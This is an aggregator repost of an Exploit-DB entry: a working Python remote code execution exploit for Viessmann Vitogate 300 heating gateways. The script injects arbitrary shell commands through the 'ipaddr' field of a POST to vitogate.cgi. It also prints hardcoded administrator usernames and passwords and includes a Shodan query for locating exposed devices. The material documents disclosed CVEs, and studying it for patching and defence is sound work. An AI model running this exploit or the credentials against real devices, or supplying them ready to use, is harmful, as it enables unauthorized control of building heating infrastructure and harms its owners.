4

[remote] Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)

 6 months ago
source link: https://www.exploit-db.com/exploits/51887
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)

EDB Verified:

Exploit:

  /  

Platform:

Hardware

Date:

2024-03-14

Vulnerable App:

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: [email protected]
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222


import argparse
import requests

def banner():
    banner = """
    ╔═══════════════════════════════════╗
             CVE-2023-5702   
           Vitogate 300 RCE
           Author: ByteHunter      
    ╚═══════════════════════════════════╝
    """

    print(banner)


def send_post_request(target_ip, command, target_port):
    payload = {
        "method": "put",
        "form": "form-4-7",
        "session": "",
        "params": {
            "ipaddr": f"1;{command}"
        }
    }

    headers = {
        "Host": target_ip,
        "Content-Length": str(len(str(payload))),
        "Content-Type": "application/json"
    }

    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"


    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Result:")
        print(response.text)
    else:
        print(f"Request failed! status code: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    parser.add_argument("--target", required=False, help="Target IP address")
    parser.add_argument("--port", required=False, help="Target port",default="80")
    parser.add_argument("--command", required=False, help="Command")
    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    args = parser.parse_args()

    if args.creds:
        print("Vitogate 300 hardcoded administrative accounts credentials")
        print("Username: vitomaster, Password: viessmann1917")
        print("Username: vitogate, Password: viessmann")
    else:
        target_ip = args.target
        target_port = args.port
        command = args.command

        if not (target_ip and command):
            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
            return

        send_post_request(target_ip, command,target_port)

if __name__ == "__main__":
    banner()
    main()

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK